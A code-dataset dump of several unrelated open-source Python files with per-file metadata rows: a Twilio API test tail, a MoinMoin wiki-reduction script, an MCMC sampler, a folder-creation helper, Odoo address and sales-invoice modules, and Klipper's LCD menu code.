"chat_service_sid": "ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "Conversation Role",
"type": "conversation",
"permissions": [
"sendMessage",
"leaveConversation",
"editOwnMessage",
"deleteOwnMessage"
],
"date_created": "2016-03-03T19:47:15Z",
"date_updated": "2016-03-03T19:47:15Z",
"url": "https://conversations.twilio.com/v1/Roles/RLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
}
]
}
'''
))
actual = self.client.conversations.v1.roles.list()
self.assertIsNotNone(actual)
def test_read_empty_response(self):
self.holodeck.mock(Response(
200,
'''
{
"meta": {
"page": 0,
"page_size": 50,
"first_page_url": "https://conversations.twilio.com/v1/Roles?PageSize=50&Page=0",
"previous_page_url": null,
"url": "https://conversations.twilio.com/v1/Roles?PageSize=50&Page=0",
"next_page_url": null,
"key": "roles"
},
"roles": []
}
'''
))
actual = self.client.conversations.v1.roles.list()
self.assertIsNotNone(actual)
| mit | -948,747,413,364,128,500 | 34.425532 | 137 | 0.525165 | false |
RealTimeWeb/wikisite | MoinMoin/script/maint/reducewiki.py | 1 | 3025 | # -*- coding: iso-8859-1 -*-
"""
MoinMoin - reducewiki script
@copyright: 2005-2006 MoinMoin:ThomasWaldmann
@license: GPL, see COPYING for details
"""
import os, shutil, codecs
from MoinMoin import config, wikiutil
from MoinMoin.Page import Page
from MoinMoin.action import AttachFile
from MoinMoin.script import MoinScript
class PluginScript(MoinScript):
"""\
Purpose:
========
This tool allows you to reduce a data/ directory to just the latest page
revision of each non-deleted page (plus all attachments).
This is used to make the distributed underlay directory, but can also be
used for other purposes.
So we change like this:
* data/pages/PageName/revisions/{1,2,3,4}
-> data/pages/revisions/1 (with content of 4)
* data/pages/PageName/current (pointing to e.g. 4)
-> same (pointing to 1)
* data/pages/PageName/edit-log and data/edit-log
-> do not copy
* data/pages/PageName/attachments/*
-> just copy
Detailed Instructions:
======================
General syntax: moin [options] maint reducewiki [reducewiki-options]
[options] usually should be:
--config-dir=/path/to/my/cfg/ --wiki-url=http://wiki.example.org/
[reducewiki-options] see below:
0. To create a wiki data/ directory with just the latest revisions in the
directory '/mywiki'
moin ... maint reducewiki --target-dir=/mywiki
"""
def __init__(self, argv, def_values):
MoinScript.__init__(self, argv, def_values)
self.parser.add_option(
"-t", "--target-dir", dest="target_dir",
help="Write reduced wiki data to DIRECTORY."
)
def copypage(self, request, rootdir, pagename):
""" quick and dirty! """
pagedir = os.path.join(rootdir, 'pages', wikiutil.quoteWikinameFS(pagename))
os.makedirs(pagedir)
# write a "current" file with content "00000001"
revstr = '%08d' % 1
cf = os.path.join(pagedir, 'current')
file(cf, 'w').write(revstr+'\n')
# create a single revision 00000001
revdir = os.path.join(pagedir, 'revisions')
os.makedirs(revdir)
tf = os.path.join(revdir, revstr)
p = Page(request, pagename)
text = p.get_raw_body().replace("\n", "\r\n")
codecs.open(tf, 'wb', config.charset).write(text)
source_dir = AttachFile.getAttachDir(request, pagename)
if os.path.exists(source_dir):
dest_dir = os.path.join(pagedir, "attachments")
os.makedirs(dest_dir)
for filename in os.listdir(source_dir):
source_file = os.path.join(source_dir, filename)
dest_file = os.path.join(dest_dir, filename)
shutil.copyfile(source_file, dest_file)
def mainloop(self):
self.init_request()
request = self.request
destdir = self.options.target_dir
pagelist = list(request.rootpage.getPageList(user=''))
for pagename in pagelist:
self.copypage(request, destdir, pagename)
| apache-2.0 | 1,400,899,292,419,346,000 | 32.241758 | 84 | 0.63438 | false |
adrn/streams | streams/rewinder/sampler.py | 2 | 2596 | # coding: utf-8
""" Special emcee sampler for Rewinder. """
from __future__ import division, print_function
__author__ = "adrn <[email protected]>"
# Standard library
import os
import sys
import time
# Third-party
from emcee import EnsembleSampler
import numpy as np
from astropy import log as logger
__all__ = ['RewinderSampler']
# TODO: banish h5py
class RewinderSampler(EnsembleSampler):
def __init__(self, model, nwalkers=None, pool=None, a=2.):
""" """
if nwalkers is None:
nwalkers = model.nparameters*2 + 2
self.nwalkers = nwalkers
super(RewinderSampler, self).__init__(self.nwalkers, model.nparameters, model,
pool=pool, a=a)
def write(self, filename, ii=None):
if ii is None:
ii = self.chain.shape[1]
# write the sampler data to an HDF5 file
logger.info("Writing sampler data to '{}'...".format(filename))
with h5py.File(filename, "w") as f:
f["last_step"] = ii
f["chain"] = self.chain
f["lnprobability"] = self.lnprobability
f["acceptance_fraction"] = self.acceptance_fraction
try:
f["acor"] = self.acor
except:
logger.warn("Failed to compute autocorrelation time.")
f["acor"] = []
def run_inference(self, pos, nsteps, output_every=None,
output_file="emcee_snapshot.txt", first_step=0): # path=
""" Custom run MCMC that caches the sampler every specified number
of steps.
"""
if output_every is None:
output_every = nsteps
logger.info("Running {} walkers for {} steps..."
.format(self.nwalkers, nsteps))
time0 = time.time()
ii = first_step
for outer_loop in range(nsteps // output_every):
self.reset()
for results in self.sample(pos, iterations=output_every):
ii += 1
# TODO: need to append to file...
# self.write(os.path.join(path,output_file_fmt.format(ii)), ii=ii)
pos = results[0]
# the remainder
remainder = nsteps % output_every
if remainder > 0:
self.reset()
for results in self.sample(pos, iterations=remainder):
ii += 1
# TODO:
# self.write(os.path.join(path,output_file_fmt.format(ii)), ii=ii)
t = time.time() - time0
logger.debug("Spent {} seconds on main sampling...".format(t))
| mit | -5,250,285,706,520,452,000 | 29.541176 | 86 | 0.555085 | false |
mmlacak/crochess | book/py/fs.py | 1 | 4102 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (c) 2017 - 2020 Mario Mlačak, [email protected]
# Licensed under 3-clause (modified) BSD license. See LICENSE for details.
import os
import os.path
SUBFOLDERS = [ \
'boards', \
\
'castlings', \
# 'castlings/01_oc', \
'castlings/02_c', \
# 'castlings/03_oct', \
'castlings/04_ct', \
# 'castlings/05_oma', \
'castlings/06_ma', \
# 'castlings/07_oaoa', \
'castlings/08_aoa', \
# 'castlings/09_omv', \
'castlings/10_mv', \
# 'castlings/11_on', \
'castlings/12_n', \
# 'castlings/13_ohd', \
'castlings/14_hd', \
# 'castlings/15_otr', \
'castlings/16_tr', \
# 'castlings/17_ocot', \
'castlings/18_cot', \
# 'castlings/19_od', \
'castlings/20_d', \
# 'castlings/21_oo', \
'castlings/22_o', \
\
'en_passants', \
\
'examples', \
# 'examples/01_oc', \
'examples/02_c', \
# 'examples/03_oct', \
'examples/04_ct', \
# 'examples/05_oma', \
'examples/06_ma', \
# 'examples/07_oaoa', \
'examples/08_aoa', \
# 'examples/09_omv', \
'examples/10_mv', \
# 'examples/11_on', \
'examples/12_n', \
# 'examples/13_ohd', \
'examples/14_hd', \
# 'examples/15_otr', \
'examples/16_tr', \
# 'examples/17_ocot', \
'examples/18_cot', \
# 'examples/19_od', \
'examples/20_d', \
# 'examples/21_oo', \
'examples/22_o', \
\
'pieces', \
'pieces/bishop', \
'pieces/star', \
\
'rush', \
\
'isa', \
# 'isa/01_oc', \
'isa/02_c', \
# 'isa/03_oct', \
'isa/04_ct', \
# 'isa/05_oma', \
'isa/06_ma', \
# 'isa/07_oaoa', \
'isa/08_aoa', \
# 'isa/09_omv', \
'isa/10_mv', \
# 'isa/11_on', \
'isa/12_n', \
# 'isa/13_ohd', \
'isa/14_hd', \
# 'isa/15_otr', \
'isa/16_tr', \
# 'isa/17_ocot', \
'isa/18_cot', \
# 'isa/19_od', \
'isa/20_d', \
# 'isa/21_oo', \
'isa/22_o', \
\
'test', \
]
def find_subfolder(path=None):
if path is None:
path = os.getcwd()
return os.path.abspath(path)
def mkdirs(folder_name):
path = os.path.normpath(os.path.abspath(folder_name))
if not os.path.isdir(path):
print(folder_name)
os.makedirs(path)
def create_subfolders(path=None):
print
old = os.getcwd()
print("Old:", old)
try:
root = find_subfolder(path=path)
print("Root:", root)
os.chdir(root)
print
print("Subfolders:")
for folder_name in SUBFOLDERS:
mkdirs(folder_name)
finally:
print("Restoring:", old)
os.chdir(old)
print
if __name__ == '__main__':
create_subfolders()
| bsd-3-clause | 4,197,805,374,679,246,000 | 30.546154 | 74 | 0.333333 | false |
gityopie/odoo-addons | website_google_address_form/controllers/main.py | 1 | 1416 | # -*- coding: utf-8 -*-
# License AGPL-3
from odoo import http
from odoo.http import request
from odoo.tools.safe_eval import safe_eval
class WebsiteGoogleAddressForm(http.Controller):
@http.route('/my/account/get_country', type='json', auth='public')
def get_country(self, country):
country_id = request.env['res.country'].sudo().search([
'|', ('code', '=', country), ('name', '=', country)])
return country_id and country_id.id or False
@http.route('/my/account/get_country_state', type='json', auth='public')
def get_country_state(self, country, state):
country_id = request.env['res.country'].sudo().search([
'|', ('code', '=', country), ('name', '=', country)])
state_id = request.env['res.country.state'].sudo().search([
'&', '|', ('code', '=', state), ('name', '=', state),
('country_id', '=', country_id.id)])
return state_id and state_id.id or False
@http.route('/gplaces/country_restrictions', type='json', auth='public')
def get_gmap_country_restriction(self):
countries = request.env['ir.config_parameter'].sudo().get_param(
'google.country_restriction', default='[]')
list_countries = safe_eval(countries)
if list_countries:
countries_code = [country[1] for country in list_countries]
return countries_code
return []
| lgpl-3.0 | -5,059,540,205,622,902,000 | 40.647059 | 76 | 0.59887 | false |
jeffery9/mixprint_addons | sale/wizard/sale_make_invoice_advance.py | 4 | 10409 | ##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
from openerp.tools.translate import _
import openerp.addons.decimal_precision as dp
class sale_advance_payment_inv(osv.osv_memory):
_name = "sale.advance.payment.inv"
_description = "Sales Advance Payment Invoice"
_columns = {
'advance_payment_method':fields.selection(
[('all', 'Invoice the whole sales order'), ('percentage','Percentage'), ('fixed','Fixed price (deposit)'),
('lines', 'Some order lines')],
'What do you want to invoice?', required=True,
help="""Use All to create the final invoice.
Use Percentage to invoice a percentage of the total amount.
Use Fixed Price to invoice a specific amound in advance.
Use Some Order Lines to invoice a selection of the sales order lines."""),
'qtty': fields.float('Quantity', digits=(16, 2), required=True),
'product_id': fields.many2one('product.product', 'Advance Product',
help="""Select a product of type service which is called 'Advance Product'.
You may have to create it and set it as a default value on this field."""),
'amount': fields.float('Advance Amount', digits_compute= dp.get_precision('Account'),
help="The amount to be invoiced in advance."),
}
def _get_advance_product(self, cr, uid, context=None):
try:
product = self.pool.get('ir.model.data').get_object(cr, uid, 'sale', 'advance_product_0')
except ValueError:
# a ValueError is returned if the xml id given is not found in the table ir_model_data
return False
return product.id
_defaults = {
'advance_payment_method': 'all',
'qtty': 1.0,
'product_id': _get_advance_product,
}
def onchange_method(self, cr, uid, ids, advance_payment_method, product_id, context=None):
if advance_payment_method == 'percentage':
return {'value': {'amount':0, 'product_id':False }}
if product_id:
product = self.pool.get('product.product').browse(cr, uid, product_id, context=context)
return {'value': {'amount': product.list_price}}
return {'value': {'amount': 0}}
def _prepare_advance_invoice_vals(self, cr, uid, ids, context=None):
if context is None:
context = {}
sale_obj = self.pool.get('sale.order')
ir_property_obj = self.pool.get('ir.property')
fiscal_obj = self.pool.get('account.fiscal.position')
inv_line_obj = self.pool.get('account.invoice.line')
wizard = self.browse(cr, uid, ids[0], context)
sale_ids = context.get('active_ids', [])
result = []
for sale in sale_obj.browse(cr, uid, sale_ids, context=context):
val = inv_line_obj.product_id_change(cr, uid, [], wizard.product_id.id,
uom_id=False, partner_id=sale.partner_id.id, fposition_id=sale.fiscal_position.id)
res = val['value']
# determine and check income account
if not wizard.product_id.id :
prop = ir_property_obj.get(cr, uid,
'property_account_income_categ', 'product.category', context=context)
prop_id = prop and prop.id or False
account_id = fiscal_obj.map_account(cr, uid, sale.fiscal_position.id or False, prop_id)
if not account_id:
raise osv.except_osv(_('Configuration Error!'),
_('There is no income account defined as global property.'))
res['account_id'] = account_id
if not res.get('account_id'):
raise osv.except_osv(_('Configuration Error!'),
_('There is no income account defined for this product: "%s" (id:%d).') % \
(wizard.product_id.name, wizard.product_id.id,))
# determine invoice amount
if wizard.amount <= 0.00:
raise osv.except_osv(_('Incorrect Data'),
_('The value of Advance Amount must be positive.'))
if wizard.advance_payment_method == 'percentage':
inv_amount = sale.amount_total * wizard.amount / 100
if not res.get('name'):
res['name'] = _("Advance of %s %%") % (wizard.amount)
else:
inv_amount = wizard.amount
if not res.get('name'):
#TODO: should find a way to call formatLang() from rml_parse
symbol = sale.pricelist_id.currency_id.symbol
if sale.pricelist_id.currency_id.position == 'after':
res['name'] = _("Advance of %s %s") % (inv_amount, symbol)
else:
res['name'] = _("Advance of %s %s") % (symbol, inv_amount)
# determine taxes
if res.get('invoice_line_tax_id'):
res['invoice_line_tax_id'] = [(6, 0, res.get('invoice_line_tax_id'))]
else:
res['invoice_line_tax_id'] = False
# create the invoice
inv_line_values = {
'name': res.get('name'),
'origin': sale.name,
'account_id': res['account_id'],
'price_unit': inv_amount,
'quantity': wizard.qtty or 1.0,
'discount': False,
'uos_id': res.get('uos_id', False),
'product_id': wizard.product_id.id,
'invoice_line_tax_id': res.get('invoice_line_tax_id'),
'account_analytic_id': sale.project_id.id or False,
}
inv_values = {
'name': sale.client_order_ref or sale.name,
'origin': sale.name,
'type': 'out_invoice',
'reference': False,
'account_id': sale.partner_id.property_account_receivable.id,
'partner_id': sale.partner_invoice_id.id,
'invoice_line': [(0, 0, inv_line_values)],
'currency_id': sale.pricelist_id.currency_id.id,
'comment': '',
'payment_term': sale.payment_term.id,
'fiscal_position': sale.fiscal_position.id or sale.partner_id.property_account_position.id
}
result.append((sale.id, inv_values))
return result
def _create_invoices(self, cr, uid, inv_values, sale_id, context=None):
inv_obj = self.pool.get('account.invoice')
sale_obj = self.pool.get('sale.order')
inv_id = inv_obj.create(cr, uid, inv_values, context=context)
inv_obj.button_reset_taxes(cr, uid, [inv_id], context=context)
# add the invoice to the sales order's invoices
sale_obj.write(cr, uid, sale_id, {'invoice_ids': [(4, inv_id)]}, context=context)
return inv_id
def create_invoices(self, cr, uid, ids, context=None):
""" create invoices for the active sales orders """
sale_obj = self.pool.get('sale.order')
act_window = self.pool.get('ir.actions.act_window')
wizard = self.browse(cr, uid, ids[0], context)
sale_ids = context.get('active_ids', [])
if wizard.advance_payment_method == 'all':
# create the final invoices of the active sales orders
res = sale_obj.manual_invoice(cr, uid, sale_ids, context)
if context.get('open_invoices', False):
return res
return {'type': 'ir.actions.act_window_close'}
if wizard.advance_payment_method == 'lines':
# open the list view of sales order lines to invoice
res = act_window.for_xml_id(cr, uid, 'sale', 'action_order_line_tree2', context)
res['context'] = {
'search_default_uninvoiced': 1,
'search_default_order_id': sale_ids and sale_ids[0] or False,
}
return res
assert wizard.advance_payment_method in ('fixed', 'percentage')
inv_ids = []
for sale_id, inv_values in self._prepare_advance_invoice_vals(cr, uid, ids, context=context):
inv_ids.append(self._create_invoices(cr, uid, inv_values, sale_id, context=context))
if context.get('open_invoices', False):
return self.open_invoices( cr, uid, ids, inv_ids, context=context)
return {'type': 'ir.actions.act_window_close'}
def open_invoices(self, cr, uid, ids, invoice_ids, context=None):
""" open a view on one of the given invoice_ids """
ir_model_data = self.pool.get('ir.model.data')
form_res = ir_model_data.get_object_reference(cr, uid, 'account', 'invoice_form')
form_id = form_res and form_res[1] or False
tree_res = ir_model_data.get_object_reference(cr, uid, 'account', 'invoice_tree')
tree_id = tree_res and tree_res[1] or False
return {
'name': _('Advance Invoice'),
'view_type': 'form',
'view_mode': 'form,tree',
'res_model': 'account.invoice',
'res_id': invoice_ids[0],
'view_id': False,
'views': [(form_id, 'form'), (tree_id, 'tree')],
'context': "{'type': 'out_invoice'}",
'type': 'ir.actions.act_window',
}
sale_advance_payment_inv()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | 9,213,265,935,563,653,000 | 47.413953 | 118 | 0.561245 | false |
KevinOConnor/klipper | klippy/extras/display/menu.py | 1 | 36379 | # -*- coding: utf-8 -*-
# Basic LCD menu support
#
# Copyright (C) 2020 Janar Sööt <[email protected]>
#
# This file may be distributed under the terms of the GNU GPLv3 license.
import os, logging, ast, re
from string import Template
from . import menu_keys
class sentinel:
pass
class error(Exception):
pass
# Scriptable menu element abstract baseclass
class MenuElement(object):
def __init__(self, manager, config, **kwargs):
if type(self) is MenuElement:
raise error(
'Abstract MenuElement cannot be instantiated directly')
self._manager = manager
self._cursor = '>'
# set class defaults and attributes from arguments
self._index = kwargs.get('index', None)
self._enable = kwargs.get('enable', True)
self._name = kwargs.get('name', None)
self._enable_tpl = self._name_tpl = None
if config is not None:
# overwrite class attributes from config
self._index = config.getint('index', self._index)
self._name_tpl = manager.gcode_macro.load_template(
config, 'name', self._name)
try:
self._enable = config.getboolean('enable', self._enable)
except config.error:
self._enable_tpl = manager.gcode_macro.load_template(
config, 'enable')
# item namespace - used in relative paths
self._ns = str(" ".join(config.get_name().split(' ')[1:])).strip()
else:
# ns - item namespace key, used in item relative paths
# $__id - generated id text variable
__id = '__menu_' + hex(id(self)).lstrip("0x").rstrip("L")
self._ns = Template(
'menu ' + kwargs.get('ns', __id)).safe_substitute(__id=__id)
self._last_heartbeat = None
self.__scroll_pos = None
self.__scroll_request_pending = False
self.__scroll_next = 0
# menu scripts
self._scripts = {}
# init
self.init()
# override
def init(self):
pass
def _render_name(self):
if self._name_tpl is not None:
context = self.get_context()
return self.manager.asflat(self._name_tpl.render(context))
return self.manager.asflat(self._name)
def _load_script(self, config, name, option=None):
"""Load script template from config or callback from dict"""
if name in self._scripts:
logging.info(
"Declaration of '%s' hides "
"previous script declaration" % (name,))
option = option or name
if isinstance(config, dict):
self._scripts[name] = config.get(option, None)
else:
self._scripts[name] = self.manager.gcode_macro.load_template(
config, option, '')
# override
def is_editing(self):
return False
# override
def is_scrollable(self):
return True
# override
def is_enabled(self):
context = self.get_context()
return self.eval_enable(context)
# override
def start_editing(self):
pass
# override
def stop_editing(self):
pass
# override
def get_context(self, cxt=None):
# get default menu context
context = self.manager.get_context(cxt)
context['menu'].update({
'ns': self.get_ns()
})
return context
def eval_enable(self, context):
if self._enable_tpl is not None:
return bool(ast.literal_eval(self._enable_tpl.render(context)))
return bool(self._enable)
# Called when a item is selected
def select(self):
self.__reset_scroller()
def heartbeat(self, eventtime):
self._last_heartbeat = eventtime
if eventtime >= self.__scroll_next:
self.__scroll_next = eventtime + 0.5
if not self.is_editing():
self.__update_scroller()
def __update_scroller(self):
if self.__scroll_pos is None and self.__scroll_request_pending is True:
self.__scroll_pos = 0
elif self.__scroll_request_pending is True:
self.__scroll_pos += 1
self.__scroll_request_pending = False
elif self.__scroll_request_pending is False:
pass # hold scroll position
elif self.__scroll_request_pending is None:
self.__reset_scroller()
def __reset_scroller(self):
self.__scroll_pos = None
self.__scroll_request_pending = False
def need_scroller(self, value):
"""
Allows to control the scroller
Parameters:
value (bool, None): True - inc. scroll pos. on next update
False - hold scroll pos.
None - reset the scroller
"""
self.__scroll_request_pending = value
def __slice_name(self, name, index):
chunks = []
for i, text in enumerate(re.split(r'(\~.*?\~)', name)):
if i & 1 == 0: # text
chunks += text
else: # glyph placeholder
chunks.append(text)
return "".join(chunks[index:])
def render_name(self, selected=False):
name = str(self._render_name())
if selected and self.__scroll_pos is not None:
name = self.__slice_name(name, self.__scroll_pos)
else:
self.__reset_scroller()
return name
def get_ns(self, name='.'):
name = str(name).strip()
if name.startswith('..'):
name = ' '.join(
[(' '.join(str(self._ns).split(' ')[:-1])), name[2:]])
elif name.startswith('.'):
name = ' '.join([str(self._ns), name[1:]])
return name.strip()
def send_event(self, event, *args):
return self.manager.send_event(
"%s:%s" % (self.get_ns(), str(event)), *args)
def get_script(self, name):
if name in self._scripts:
return self._scripts[name]
return None
def _run_script(self, name, context):
_render = getattr(self._scripts[name], 'render', None)
# check template
if _render is not None and callable(_render):
return _render(context)
# check callback
elif callable(self._scripts[name]):
return self._scripts[name](self, context)
# check static string
elif isinstance(self._scripts[name], str):
return self._scripts[name]
def run_script(self, name, **kwargs):
event = kwargs.get('event', None)
context = kwargs.get('context', None)
render_only = kwargs.get('render_only', False)
result = ""
# init context
if name in self._scripts:
context = self.get_context(context)
context['menu'].update({
'event': event or name
})
result = self._run_script(name, context)
if not render_only:
# run result as gcode
self.manager.queue_gcode(result)
# default behaviour
_handle = getattr(self, "handle_script_" + name, None)
if callable(_handle):
_handle()
return result
@property
def cursor(self):
return str(self._cursor)[:1]
@property
def manager(self):
return self._manager
@property
def index(self):
return self._index
class MenuContainer(MenuElement):
"""Menu container abstract class"""
def __init__(self, manager, config, **kwargs):
if type(self) is MenuContainer:
raise error(
'Abstract MenuContainer cannot be instantiated directly')
super(MenuContainer, self).__init__(manager, config, **kwargs)
self._populate_cb = kwargs.get('populate', None)
self._cursor = '>'
self.__selected = None
self._allitems = []
self._names = []
self._items = []
def init(self):
super(MenuContainer, self).init()
# recursive guard
self._parents = []
# overload
def _names_aslist(self):
return []
# overload
def is_accepted(self, item):
return isinstance(item, MenuElement)
def is_editing(self):
return any([item.is_editing() for item in self._items])
def stop_editing(self):
for item in self._items:
if item.is_editing():
item.stop_editing()
def lookup_item(self, item):
if isinstance(item, str):
name = item.strip()
ns = self.get_ns(name)
return (self.manager.lookup_menuitem(ns), name)
elif isinstance(item, MenuElement):
return (item, item.get_ns())
return (None, item)
# overload
def _lookup_item(self, item):
return self.lookup_item(item)
def _index_of(self, item):
try:
index = None
if isinstance(item, str):
s = item.strip()
index = self._names.index(s)
elif isinstance(item, MenuElement):
index = self._items.index(item)
return index
except ValueError:
return None
def index_of(self, item, look_inside=False):
index = self._index_of(item)
if index is None and look_inside is True:
for con in self:
if isinstance(con, MenuContainer) and con._index_of(item):
index = self._index_of(con)
return index
def add_parents(self, parents):
if isinstance(parents, list):
self._parents.extend(parents)
else:
self._parents.append(parents)
def assert_recursive_relation(self, parents=None):
assert self not in (parents or self._parents), \
"Recursive relation of '%s' container" % (self.get_ns(),)
def insert_item(self, s, index=None):
self._insert_item(s, index)
def _insert_item(self, s, index=None):
item, name = self._lookup_item(s)
if item is not None:
if not self.is_accepted(item):
raise error("Menu item '%s'is not accepted!" % str(type(item)))
if isinstance(item, (MenuElement)):
item.init()
if isinstance(item, (MenuContainer)):
item.add_parents(self._parents)
item.add_parents(self)
item.assert_recursive_relation()
if index is None:
self._allitems.append((item, name))
else:
self._allitems.insert(index, (item, name))
# overload
def _populate(self):
pass
def populate(self):
self._allitems = [] # empty list
for name in self._names_aslist():
self._insert_item(name)
# populate successor items
self._populate()
# run populate callback
if self._populate_cb is not None and callable(self._populate_cb):
self._populate_cb(self)
# send populate event
self.send_event('populate', self)
def update_items(self):
_a = [(item, name) for item, name in self._allitems
if item.is_enabled()]
self._items, self._names = zip(*_a) or ([], [])
# select methods
def init_selection(self):
self.select_at(0)
def select_at(self, index):
self.__selected = index
# select element
item = self.selected_item()
if isinstance(item, MenuElement):
item.select()
return item
def select_item(self, needle):
if isinstance(needle, MenuElement):
if self.selected_item() is not needle:
index = self.index_of(needle)
if index is not None:
self.select_at(index)
else:
logging.error("Cannot select non menuitem")
return self.selected
def selected_item(self):
if isinstance(self.selected, int) and 0 <= self.selected < len(self):
return self[self.selected]
else:
return None
def select_next(self):
if not isinstance(self.selected, int):
index = 0 if len(self) else None
elif 0 <= self.selected < len(self) - 1:
index = self.selected + 1
else:
index = self.selected
return self.select_at(index)
def select_prev(self):
if not isinstance(self.selected, int):
index = 0 if len(self) else None
elif 0 < self.selected < len(self):
index = self.selected - 1
else:
index = self.selected
return self.select_at(index)
# override
def draw_container(self, nrows, eventtime):
pass
def __iter__(self):
return iter(self._items)
def __len__(self):
return len(self._items)
def __getitem__(self, key):
return self._items[key]
@property
def selected(self):
return self.__selected
class MenuDisabled(MenuElement):
def __init__(self, manager, config, **kwargs):
super(MenuDisabled, self).__init__(manager, config, name='')
def is_enabled(self):
return False
class MenuCommand(MenuElement):
def __init__(self, manager, config, **kwargs):
super(MenuCommand, self).__init__(manager, config, **kwargs)
self._load_script(config or kwargs, 'gcode')
class MenuInput(MenuCommand):
def __init__(self, manager, config, **kwargs):
super(MenuInput, self).__init__(manager, config, **kwargs)
# set class defaults and attributes from arguments
self._input = kwargs.get('input', None)
self._input_min = kwargs.get('input_min', -999999.0)
self._input_max = kwargs.get('input_max', 999999.0)
self._input_step = kwargs.get('input_step', 1.0)
self._realtime = kwargs.get('realtime', False)
self._input_tpl = self._input_min_tpl = self._input_max_tpl = None
if config is not None:
# overwrite class attributes from config
self._realtime = config.getboolean('realtime', self._realtime)
self._input_tpl = manager.gcode_macro.load_template(
config, 'input')
self._input_min_tpl = manager.gcode_macro.load_template(
config, 'input_min', str(self._input_min))
self._input_max_tpl = manager.gcode_macro.load_template(
config, 'input_max', str(self._input_max))
self._input_step = config.getfloat(
'input_step', self._input_step, above=0.)
def init(self):
super(MenuInput, self).init()
self._is_dirty = False
self.__last_change = None
self._input_value = None
def is_scrollable(self):
return False
def is_editing(self):
return self._input_value is not None
def stop_editing(self):
if not self.is_editing():
return
self._reset_value()
def start_editing(self):
if self.is_editing():
return
self._init_value()
def heartbeat(self, eventtime):
super(MenuInput, self).heartbeat(eventtime)
if (self._is_dirty is True
and self.__last_change is not None
and self._input_value is not None
and (eventtime - self.__last_change) > 0.250):
if self._realtime is True:
self.run_script('gcode', event='change')
self.run_script('change')
self._is_dirty = False
def get_context(self, cxt=None):
context = super(MenuInput, self).get_context(cxt)
value = (self._eval_value(context) if self._input_value is None
else self._input_value)
context['menu'].update({
'input': value
})
return context
def is_enabled(self):
context = super(MenuInput, self).get_context()
return self.eval_enable(context)
def _eval_min(self, context):
try:
if self._input_min_tpl is not None:
return float(ast.literal_eval(
self._input_min_tpl.render(context)))
return float(self._input_min)
except ValueError:
logging.exception("Input min value evaluation error")
def _eval_max(self, context):
try:
if self._input_max_tpl is not None:
return float(ast.literal_eval(
self._input_max_tpl.render(context)))
return float(self._input_max)
except ValueError:
logging.exception("Input max value evaluation error")
def _eval_value(self, context):
try:
if self._input_tpl is not None:
return float(ast.literal_eval(
self._input_tpl.render(context)))
return float(self._input)
except ValueError:
logging.exception("Input value evaluation error")
def _value_changed(self):
self.__last_change = self._last_heartbeat
self._is_dirty = True
def _init_value(self):
context = super(MenuInput, self).get_context()
self._input_value = None
self._input_min = self._eval_min(context)
self._input_max = self._eval_max(context)
self._input_value = min(self._input_max, max(
self._input_min, self._eval_value(context)))
self._value_changed()
def _reset_value(self):
self._input_value = None
def _get_input_step(self, fast_rate=False):
return ((10.0 * self._input_step) if fast_rate and (
(self._input_max - self._input_min) / self._input_step > 100.0)
else self._input_step)
def inc_value(self, fast_rate=False):
last_value = self._input_value
if self._input_value is None:
return
input_step = self._get_input_step(fast_rate)
self._input_value += abs(input_step)
self._input_value = min(self._input_max, max(
self._input_min, self._input_value))
if last_value != self._input_value:
self._value_changed()
def dec_value(self, fast_rate=False):
last_value = self._input_value
if self._input_value is None:
return
input_step = self._get_input_step(fast_rate)
self._input_value -= abs(input_step)
self._input_value = min(self._input_max, max(
self._input_min, self._input_value))
if last_value != self._input_value:
self._value_changed()
# default behaviour on click
def handle_script_click(self):
if not self.is_editing():
self.start_editing()
elif self.is_editing():
self.stop_editing()
class MenuList(MenuContainer):
def __init__(self, manager, config, **kwargs):
super(MenuList, self).__init__(manager, config, **kwargs)
self._viewport_top = 0
def _cb(el, context):
el.manager.back()
# create back item
self._itemBack = self.manager.menuitem_from(
'command', name='..', gcode=_cb)
def _names_aslist(self):
return self.manager.lookup_children(self.get_ns())
def _populate(self):
super(MenuList, self)._populate()
self._viewport_top = 0
# add back as first item
self.insert_item(self._itemBack, 0)
def draw_container(self, nrows, eventtime):
display = self.manager.display
selected_row = self.selected
# adjust viewport
if selected_row is not None:
if selected_row >= (self._viewport_top + nrows):
self._viewport_top = (selected_row - nrows) + 1
if selected_row < self._viewport_top:
self._viewport_top = selected_row
else:
self._viewport_top = 0
# clamps viewport
self._viewport_top = max(0, min(self._viewport_top, len(self) - nrows))
try:
y = 0
for row in range(self._viewport_top, self._viewport_top + nrows):
text = ""
prefix = ""
suffix = ""
if row < len(self):
current = self[row]
selected = (row == selected_row)
if selected:
current.heartbeat(eventtime)
text = current.render_name(selected)
# add prefix (selection indicator)
if selected and not current.is_editing():
prefix = current.cursor
elif selected and current.is_editing():
prefix = '*'
else:
prefix = ' '
# add suffix (folder indicator)
if isinstance(current, MenuList):
suffix += '>'
# draw to display
plen = len(prefix)
slen = len(suffix)
width = self.manager.cols - plen - slen
# draw item prefix (cursor)
ppos = display.draw_text(y, 0, prefix, eventtime)
# draw item name
tpos = display.draw_text(y, ppos, text.ljust(width), eventtime)
# check scroller
if (selected and tpos > self.manager.cols
and current.is_scrollable()):
# scroll next
current.need_scroller(True)
else:
# reset scroller
current.need_scroller(None)
# draw item suffix
if suffix:
display.draw_text(
y, self.manager.cols - slen, suffix, eventtime)
# next display row
y += 1
except Exception:
logging.exception('List drawing error')
class MenuVSDList(MenuList):
def __init__(self, manager, config, **kwargs):
super(MenuVSDList, self).__init__(manager, config, **kwargs)
def _populate(self):
super(MenuVSDList, self)._populate()
sdcard = self.manager.printer.lookup_object('virtual_sdcard', None)
if sdcard is not None:
files = sdcard.get_file_list()
for fname, fsize in files:
self.insert_item(self.manager.menuitem_from(
'command', name=repr(fname), gcode='M23 /%s' % str(fname)))
